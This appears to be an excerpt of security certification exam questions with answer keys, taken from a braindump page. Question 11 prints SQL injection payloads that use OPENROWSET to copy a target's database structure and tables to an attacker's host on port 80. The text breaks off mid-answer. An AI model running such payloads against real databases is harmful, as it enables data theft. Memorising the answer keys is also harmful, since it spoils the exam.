Which of the following flaws refers to an application using poorly written encryption code to
securely encrypt and store sensitive data in the database and allows an attacker to steal or
modify weakly protected data such as credit card numbers, SSNs, and other authentication
credentials?
A. SSI injection attack
B. Insecure cryptographic storage attack
C. Hidden field manipulation attack
D. Man-in-the-Middle attack
Answer(s): B
QUESTION: 11
A penetration tester tries to transfer the database from the target machine to a different
machine. For this, he uses OPENROWSET to link the target database to his own database,
replicates the database structure, and transfers the data to his machine by via a connection to
the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET
('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from
mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from
mydatabase..table1') select * from database..table1 -
What query does he need in order to transfer the column?
A. '; insert into
OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 8 0;',
'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables -
B. '; insert into
OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 8 0;',
'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows -
C. '; insert into
https://Free-Braindumps.com